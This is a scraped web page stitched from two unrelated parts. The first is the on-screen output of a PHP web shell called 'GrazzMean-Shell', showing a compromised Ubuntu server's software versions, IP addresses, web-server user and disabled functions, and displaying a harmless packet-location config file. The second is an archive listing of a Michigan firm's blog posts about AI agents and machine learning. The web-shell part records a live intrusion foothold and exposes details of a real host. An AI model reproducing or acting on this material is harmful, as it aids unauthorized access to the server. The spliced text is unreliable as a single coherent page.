shell bypass 403

GrazzMean-Shell Shell

: /etc/libnl-3/ [ drwxr-xr-x ]
Uname: Linux wputd 5.4.0-200-generic #220-Ubuntu SMP Fri Sep 27 13:19:16 UTC 2024 x86_64
Software: Apache/2.4.41 (Ubuntu)
PHP version: 7.4.3-4ubuntu2.24 [ PHP INFO ] PHP os: Linux
Server Ip: 158.69.144.88
Your Ip: 3.145.84.128
User: www-data (33) | Group: www-data (33)
Safe Mode: OFF
Disable Function:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,

name : pktloc
#
# Location definitions for packet matching
#

# name		alignment	offset		mask		shift
ip.version	u8		net+0		0xF0		4
ip.hdrlen	u8		net+0		0x0F
ip.diffserv	u8		net+1
ip.length	u16		net+2
ip.id		u16		net+4
ip.flag.res	u8		net+6		0xff		7
ip.df		u8		net+6		0x40		6
ip.mf		u8		net+6		0x20		5
ip.offset	u16		net+6		0x1FFF
ip.ttl		u8		net+8
ip.proto	u8		net+9
ip.chksum	u16		net+10
ip.src		u32		net+12
ip.dst		u32		net+16

# if ip.ihl > 5
ip.opts		u32		net+20


#
# IP version 6
#
# name		alignment	offset		mask		shift
ip6.version	u8		net+0		0xF0		4
ip6.tc		u16		net+0		0xFF0		4
ip6.flowlabel	u32		net+0		0xFFFFF
ip6.length	u16		net+4
ip6.nexthdr	u8		net+6
ip6.hoplimit	u8		net+7
ip6.src		16		net+8
ip6.dst		16		net+24

#
# Transmission Control Protocol (TCP)
#
# name		alignment	offset		mask		shift
tcp.sport	u16		tcp+0
tcp.dport	u16		tcp+2
tcp.seq		u32		tcp+4
tcp.ack		u32		tcp+8

# Data offset (4 bits)
tcp.off		u8		tcp+12		0xF0		4

# Reserved [0 0 0] (3 bits)
tcp.reserved	u8		tcp+12		0x04		1

# ECN [N C E] (3 bits)
tcp.ecn		u16		tcp+12		0x01C00		6

# Individual TCP flags (0|1) (6 bits in total)
tcp.flag.urg	u8		tcp+13		0x20		5
tcp.flag.ack	u8		tcp+13		0x10		4
tcp.flag.psh	u8		tcp+13		0x08		3
tcp.flag.rst	u8		tcp+13		0x04		2
tcp.flag.syn	u8		tcp+13		0x02		1
tcp.flag.fin	u8		tcp+13		0x01

tcp.win		u16		tcp+14
tcp.csum	u16		tcp+16
tcp.urg		u16		tcp+18
tcp.opts	u32		tcp+20

#
# User Datagram Protocol (UDP)
#
# name		alignment	offset		mask		shift
udp.sport	u16		tcp+0
udp.dport	u16		tcp+2
udp.length	u16		tcp+4
udp.csum	u16		tcp+6
© 2025 GrazzMean-Shell
Machine Learning / AI Archives - Page 3 of 12 - Michigan AI Application Development - Best Microsoft C# Developers & Technologists

Tech Blog

Tech Insights, Information, and Inspiration
Demystifying AI Agents: Understanding the Building Blocks of Artificial Intelligence

Demystifying AI Agents: Understanding the Building Blocks of Artificial Intelligence

At the heart of AI’s capabilities are intelligent systems known as AI agents. These agents possess the ability to perceive their environment, make decisions, and take actions based on their objectives. In this blog post, we will demystify AI agents by exploring their fundamental building blocks and shedding light on how they operate.

AI Model Agents and the Future of Work: Augmenting Human Capabilities and Redefining Job Roles

AI Model Agents and the Future of Work: Augmenting Human Capabilities and Redefining Job Roles

AI model agents have the potential to augment human capabilities in numerous ways, providing enhanced support and efficiency across various industries. By leveraging machine learning algorithms and deep neural networks, these agents can analyze complex data sets and extract valuable insights, allowing humans to make more informed decisions.

Understanding GANs: How Generative Adversarial Networks are Transforming AI

Understanding GANs: How Generative Adversarial Networks are Transforming AI

In the world of artificial intelligence, Generative Adversarial Networks, or GANs, have emerged as a powerful and revolutionary concept. With their ability to generate realistic and high-quality synthetic data, GANs have captured the attention of researchers, developers, and enthusiasts alike. These networks are transforming the way we approach various AI applications, from computer vision and image synthesis to natural language processing and even drug discovery.

GPT Few-Shot Learning

GPT Few-Shot Learning

GPT few-shot learning refers to the ability of Generative Pre-trained Transformer (GPT) models to learn and generalize from a small number of examples or training instances, also known as “few-shot learning.” In the context of GPT models like GPT-3, few-shot learning demonstrates the model’s capacity to understand and perform tasks with very limited guidance or additional training.

Get In Touch

7 + 2 =

UseTech Design, LLC
TROY, MI • BLOOMFIELD HILLS, MI
Call or text +1(734) 367-4100

Approaching AI: How Today’s Businesses Can Harness Its Capabilities

Artificial Intelligence (AI) has transitioned from being a speculative concept in science fiction to a transformative force across numerous industries. Among the most intriguing aspects of AI are AI agents, which are software entities that perform tasks on behalf of users. Understanding AI agents in real-world terms involves examining their components, capabilities, applications, and the ethical considerations they raise.

AI Agents: Bridging the Gap Between Technology and Real-World Applications

Among the most intriguing aspects of AI are AI agents, which are software entities that perform tasks on behalf of users. Understanding AI agents in real-world terms involves examining their components, capabilities, applications, and the ethical considerations they raise.

Utilizing AI Agents for Effective Legacy Code Modernization

As companies strive to keep pace with innovation, the modernization of legacy code becomes imperative. Artificial Intelligence (AI) agents offer a compelling solution to this problem, providing sophisticated tools and methodologies to facilitate the transition from legacy systems to modern architectures.

Embracing the Future: How AI Agents Will Change Everything

The future with AI agent technology holds immense promise for transforming our world in profound and unprecedented ways. From personalized experiences and seamless integration into daily life to empowering human-computer collaboration and revolutionizing healthcare, AI agents are poised to redefine the way we live, work, and interact with technology.

AI Agents vs. Traditional Customer Support: A Comparative Analysis

While traditional support offers a human touch and emotional connection, AI agents provide scalability, efficiency, and 24/7 availability. Moving forward, businesses must carefully assess their unique needs and customer expectations to determine the optimal balance between AI-driven automation and human interaction.

The Future of Business Intelligence: AI Solutions for Data-driven Decision Making

The future of business intelligence is AI-powered, where data becomes not just a strategic asset but a competitive advantage. In today’s hyper-connected digital world, data has become the lifeblood of business operations. Every click, purchase, and interaction generates valuable information that, when analyzed effectively, can provide crucial insights for strategic decision-making.

Democratized AI: Making Artificial Intelligence Accessible to All

Democratized AI has the potential to revolutionize industries and improve society by making AI technologies more accessible and inclusive. However, it also presents challenges such as data privacy, bias, and ethical considerations that must be addressed to ensure responsible implementation.

Explainable AI (XAI): Techniques and Methodologies within the Field of AI

Imagine a black box. You feed data into it, and it spits out a decision. That’s how many AI systems have traditionally functioned. This lack of transparency can be problematic, especially when it comes to trusting the AI’s reasoning. This is where Explainable AI (XAI) comes in.

Building an AI-Ready Workforce: Key Skills and Training Strategies

As artificial intelligence (AI) continues to transform industries and reshape the employment landscape, the demand for a skilled AI-ready workforce intensifies. Organizations across various sectors are recognizing the imperative of equipping their employees with the necessary skills and knowledge to thrive in an AI-driven world.

Working Together: Approaches to Multi-agent Collaboration in AI

Imagine a team of specialists – a data whiz, a communication expert, and an action master – all working in sync. This is the power of multi-agent collaboration, with the potential to revolutionize fields like scientific discovery, robotics, and self-driving cars. But getting these AI agents to collaborate effectively presents unique challenges